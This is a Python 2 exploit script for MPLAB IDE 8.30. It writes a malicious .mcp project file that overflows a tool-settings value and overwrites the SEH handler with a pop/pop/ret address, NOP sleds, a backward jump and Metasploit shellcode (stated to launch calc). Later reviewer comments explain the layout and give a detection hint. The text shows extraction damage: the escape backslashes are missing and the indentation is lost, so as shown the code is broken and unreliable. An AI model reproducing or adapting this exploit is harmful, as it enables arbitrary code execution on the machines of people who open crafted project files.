# Title : MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit
# Published : 2009-05-11
# Author : His0k4
# usage: mplab.py then open the project file :)
# Download : http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p)
# Start-up banner, written as Python 2 print statements.
# It names the affected product and file type (MPLAB IDE 8.30, .mcp project files),
# the advisory it refers to (Secunia 35054) and the single platform the author
# reports testing on (Windows XP Pro SP3, English).
# NOTE(review): the trailing "n" on several literals looks like a "\n" escape whose
# backslash was lost when this page was extracted; as shown, a literal "n" is printed.
print "**************************************************************************"
print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploitn"
print " Refer : Secunia advisory (35054)n"
print " Exploit code: His0k4n"
print " Tested on: Windows XP Pro SP3 (EN)n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.comn"
print "**************************************************************************"
# header1 / header2: the well-formed text that surrounds the oversized field.
# NOTE(review): every "xNN" pair below looks like a "\xNN" escape whose backslash was
# lost in extraction; as shown these are literal characters, not the bytes described.
#
# Read as \xNN escapes, header1 is plain ASCII with CRLF line ends: the opening of an
# .mcp project file ([HEADER] with magic_cookie and file_version=1.0, [PATH_INFO],
# [CAT_FILTERS], [SUITE_INFO], [TOOL_SETTINGS]) ending in an unterminated value
#   TS{BFD27FBA-4A02-4C0E-A5E5-B812F3E7707C}=/o"
# The script later concatenates its data directly after this opening quote, so the
# overlong input is the quoted /o"..." value of that [TOOL_SETTINGS] entry.
# Detection hint: in a legitimate project this value is presumably a short output
# path; an .mcp whose /o"..." value runs to hundreds of bytes or contains
# non-printable bytes is worth flagging before it is opened.
header1 = (
"x5bx48x45x41x44x45x52x5dx0dx0ax6dx61x67x69x63x5f"
"x63x6fx6fx6bx69x65x3dx7bx36x36x45x39x39x42x30x37"
"x2dx45x37x30x36x2dx34x36x38x39x2dx39x45x38x30x2d"
"x39x42x32x35x38x32x38x39x38x41x31x33x7dx0dx0ax66"
"x69x6cx65x5fx76x65x72x73x69x6fx6ex3dx31x2ex30x0d"
"x0ax5bx50x41x54x48x5fx49x4ex46x4fx5dx0dx0ax64x69"
"x72x5fx73x72x63x3dx0dx0ax64x69x72x5fx62x69x6ex3d"
"x0dx0ax64x69x72x5fx74x6dx70x3dx0dx0ax64x69x72x5f"
"x73x69x6ex3dx0dx0ax64x69x72x5fx69x6ex63x3dx0dx0a"
"x64x69x72x5fx6cx69x62x3dx0dx0ax64x69x72x5fx6cx6b"
"x72x3dx0dx0ax5bx43x41x54x5fx46x49x4cx54x45x52x53"
"x5dx0dx0ax66x69x6cx74x65x72x5fx73x72x63x3dx2ax2e"
"x61x73x6dx0dx0ax66x69x6cx74x65x72x5fx69x6ex63x3d"
"x2ax2ex68x3bx2ax2ex69x6ex63x0dx0ax66x69x6cx74x65"
"x72x5fx6fx62x6ax3dx2ax2ex6fx0dx0ax66x69x6cx74x65"
"x72x5fx6cx69x62x3dx2ax2ex6cx69x62x0dx0ax66x69x6c"
"x74x65x72x5fx6cx6bx72x3dx2ax2ex6cx6bx72x0dx0ax5b"
"x53x55x49x54x45x5fx49x4ex46x4fx5dx0dx0ax73x75x69"
"x74x65x5fx67x75x69x64x3dx7bx36x42x33x44x41x41x37"
"x38x2dx35x39x43x31x2dx34x36x44x44x2dx42x36x41x41"
"x2dx44x42x44x41x45x34x45x30x36x34x38x34x7dx0dx0a"
"x73x75x69x74x65x5fx73x74x61x74x65x3dx0dx0ax5bx54"
"x4fx4fx4cx5fx53x45x54x54x49x4ex47x53x5dx0dx0ax54"
"x53x7bx42x46x44x32x37x46x42x41x2dx34x41x30x32x2d"
"x34x43x30x45x2dx41x35x45x35x2dx42x38x31x32x46x33"
"x45x37x37x30x37x43x7dx3dx2fx6fx22")
# Read as \xNN escapes, header2 closes the quoted value with `.cof"` + CRLF and adds
# one further, empty entry: TS{ADE93A55-C7C7-4D4D-A4BA-59305F7D0391}= + CRLF.
header2 = (
"x2ex63x6fx66x22x0dx0ax54x53x7bx41x44x45x39x33x41"
"x35x35x2dx43x37x43x37x2dx34x44x34x44x2dx41x34x42"
"x41x2dx35x39x33x30x35x46x37x44x30x33x39x31x7dx3d"
"x0dx0a")
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Generator-produced payload. Per the generator comment above it runs `calc`, i.e. a
# harmless proof-of-concept command; the bytes are encoded, so that claim cannot be
# confirmed by reading them here.
# The literal is 10 rows of 16 "xNN" pairs = 160 bytes when read as \xNN escapes,
# which matches the Size=160 in the generator comment.
# NOTE(review): the backslashes of the escapes appear to have been lost in extraction;
# as shown this is a string of literal characters, not those 160 bytes.
shellcode=(
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x79"
"x1fx8cx11x83xebxfcxe2xf4x85xf7xc8x11x79x1fx07x54"
"x45x94xf0x14x01x1ex63x9ax36x07x07x4ex59x1ex67x58"
"xf2x2bx07x10x97x2ex4cx88xd5x9bx4cx65x7exdex46x1c"
"x78xddx67xe5x42x4bxa8x15x0cxfax07x4ex5dx1ex67x77"
"xf2x13xc7x9ax26x03x8dxfaxf2x03x07x10x92x96xd0x35"
"x7dxdcxbdxd1x1dx94xccx21xfcxdfxf4x1dxf2x5fx80x9a"
"x09x03x21x9ax11x17x67x18xf2x9fx3cx11x79x1fx07x79"
"x45x40xbdxe7x19x49x05xe9xfaxdfxf7x41x11xefx06x15"
"x26x77x14xefxf3x11xdbxeex9ex7cxedx7dx1ax1fx8cx11")
# Layout of the data placed inside the quoted /o"..." value (between header1 and
# header2). All lengths below assume the "xNN" pairs are \xNN escapes; the
# backslashes appear to have been lost in extraction, so as shown len(shellcode)
# counts literal characters and the arithmetic no longer reflects the author's layout.
# Filler ("A" bytes) sized so that filler + payload together occupy 226 bytes.
buff = "x41" * (226-len(shellcode))
# 4 bytes that land on the "next SEH record" pointer; the first is 0x74, an x86
# short conditional-jump opcode, with a negative displacement byte after it.
next_seh = "x74xc9x41x42"
# 4 bytes that land on the SEH handler pointer: 0x00401312 read little-endian.
# The author's note says it is a pop/pop/ret sequence inside MPLAB.exe itself.
# NOTE(review): SafeSEH and SEHOP exist to reject exactly this kind of handler
# overwrite. Whether MPLAB.exe 8.30 opts into them is not shown on this page; the
# use of an address in the main executable suggests it does not. Confirm on the binary.
seh = "x12x13x40x00" #p/p/r MPLAB.exe
# Two runs of 0x90 (x86 NOP): 20 bytes after the payload, 28 bytes after the jump.
nops1 = "x90"*20
nops2 = "x90"*28
# 5 bytes starting with 0xE9 (x86 near jump) and a negative 32-bit displacement,
# i.e. a jump backwards; the author's aside is Darija, roughly "come back to me".
mshellcode = "xE9x47xFFxFFxFF" #welli 3liya :p
# Final file content: valid header text, then filler, payload, NOPs, the backward
# jump, NOPs, the two overwritten SEH fields, then the closing header text.
exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2
# Write the assembled content to "exploit.mcp" in the current directory, then wait
# for Enter (Python 2 raw_input) so the confirmation stays on screen.
# NOTE(review): the bodies of try/except are shown without indentation, which looks
# like extraction damage; as shown this block is not valid Python.
# NOTE(review): the bare except reports every failure as "Error", hiding the cause,
# and the file handle is not closed if write() raises.
try:
out_file = open("exploit.mcp",'w')
out_file.write(exploit)
out_file.close()
raw_input("nExploit file created!n")
except:
print "Error"